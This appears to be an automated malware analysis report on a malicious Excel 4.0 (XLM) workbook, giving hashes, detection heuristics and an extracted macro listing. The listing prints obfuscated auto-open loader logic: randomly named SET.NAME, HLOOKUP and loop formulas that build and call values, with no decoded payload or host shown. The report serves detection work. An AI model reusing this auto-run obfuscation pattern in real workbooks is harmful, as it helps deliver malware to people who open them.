Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 322ee1a8d7f3f9f2…

MALICIOUS

Office (OLE)

36.5 KB Created: 2020-11-27 11:41:13 Authoring application: Microsoft Excel First seen: 2021-03-01
MD5: 7a51d386c11748d3b2c56d58d204089e SHA-1: 8ce3cadda1112c2615190ea3047bc2608e3c1b3a SHA-256: 322ee1a8d7f3f9f2814ccb12c2074ebd56781813eca0f06d83e07486018245f1
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6835 bytes
SHA-256: b362fe33eca724019b7d6c5a0bf723910068755aa6f6ef6f76376e5aa5efb05e
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  gyYVXfpAuPX
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!F164 
' 0018     24 LABEL : Cell Value, String Constant - BMwRuXUVe len=0 
' 0018     24 LABEL : Cell Value, String Constant - ckXsMPiGg len=0 
' 0018     24 LABEL : Cell Value, String Constant - cvxezMDGe len=0 
' 0018     21 LABEL : Cell Value, String Constant - ezjEim len=0 
' 0018     23 LABEL : Cell Value, String Constant - FKUkKtwl len=0 
' 0018     23 LABEL : Cell Value, String Constant - fSJhevII len=0 
' 0018     21 LABEL : Cell Value, String Constant - GlzeeJ len=0 
' 0018     23 LABEL : Cell Value, String Constant - gTYOcBOg len=0 
' 0018     23 LABEL : Cell Value, String Constant - iByxXjjU len=0 
' 0018     21 LABEL : Cell Value, String Constant - jUrYUY len=0 
' 0018     27 LABEL : Cell Value, String Constant - lVSjppGaklwI len=0 
' 0018     21 LABEL : Cell Value, String Constant - pmEUPN len=0 
' 0018     21 LABEL : Cell Value, String Constant - qYmckm len=0 
' 0018     22 LABEL : Cell Value, String Constant - rzYpyXD len=0 
' 0018     20 LABEL : Cell Value, String Constant - sZkGC len=0 
' 0018     23 LABEL : Cell Value, String Constant - vbQQIOEe len=0 
' 0018     26 LABEL : Cell Value, String Constant - wfIXvxFyEgr len=0 
' 0018     23 LABEL : Cell Value, String Constant - xeWiqvND len=0 
' 0018     24 LABEL : Cell Value, String Constant - ZdQgROQdN len=0 
' 0018     24 LABEL : Cell Value, String Constant - zlOCrKzwi len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  gyYVXfpAuPX,T45,"",-391.00000000000000000000
'  gyYVXfpAuPX,T46,"",958.00000000000000000000
'  gyYVXfpAuPX,T47,"",467.00000000000000000000
'  gyYVXfpAuPX,T48,"",364.00000000000000000000
'  gyYVXfpAuPX,T49,"",-561.00000000000000000000
'  gyYVXfpAuPX,T50,"",470.00000000000000000000
'  gyYVXfpAuPX,F77,"SET.NAME("qYmckm",0+VALUE("0"))",""
'  gyYVXfpAuPX,F82,"SET.NAME("GlzeeJ",qYmckm)",""
'  gyYVXfpAuPX,F84,"SET.NAME("rzYpyXD",qYmckm)",""
'  gyYVXfpAuPX,F89,"SET.NAME("sZkGC",COUNTA(ckXsMPiGg))",""
'  gyYVXfpAuPX,F92,"SET.NAME("jUrYUY",COUNTA(cvxezMDGe))",""
'  gyYVXfpAuPX,F96,[],""
'  gyYVXfpAuPX,F98,"SET.NAME("xeWiqvND","")",""
'  gyYVXfpAuPX,F102,"GlzeeJ",""
'  gyYVXfpAuPX,F104,"SET.NAME("wfIXvxFyEgr",HLOOKUP("*",ckXsMPiGg,GlzeeJ,FALSE))",""
'  gyYVXfpAuPX,F107,"ZdQgROQdN",""
'  gyYVXfpAuPX,F110,"SET.NAME("fSJhevII",qYmckm)",""
'  gyYVXfpAuPX,F114,[],""
'  gyYVXfpAuPX,F118,"fSJhevII",""
'  gyYVXfpAuPX,F123,"gTYOcBOg",""
'  gyYVXfpAuPX,F127,"vbQQIOEe",""
'  gyYVXfpAuPX,F131,"ezjEim",""
'  gyYVXfpAuPX,F133,"SET.NAME("zlOCrKzwi",VALUE(HLOOKUP("*",cvxezMDGe,ezjEim,FALSE)))",""
'  gyYVXfpAuPX,F136,"BMwRuXUVe",""
'  gyYVXfpAuPX,F140,"xeWiqvND",""
'  gyYVXfpAuPX,F142,"rzYpyXD",""
'  gyYVXfpAuPX,F145,NEXT(),""
'  gyYVXfpAuPX,F147,"pmEUPN",""
'  gyYVXfpAuPX,F152,[],""
'  gyYVXfpAuPX,F155,"iByxXjjU",""
'  gyYVXfpAuPX,F158,NEXT(),""
'  gyYVXfpAuPX,F160,RETURN(),""
'  gyYVXfpAuPX,F189,"SET.NAME("lVSjppGaklwI",F77)",""
'  gyYVXfpAuPX,F191,"ckXsMPiGg",""
'  gyYVXfpAuPX,F196,"SET.NAME("cvxezMDGe",R52C13)",""
'  gyYVXfpAuPX,F199,"SET.NAME("iByxXjjU",208)",""
'  gyYVXfpAuPX,F204,"SET.NAME("FKUkKtwl",6)",""
'  gyYVXfpAuPX,F207,lVSjppGaklwI(),""
'  gyYVXfpAuPX,F208,HALT(),""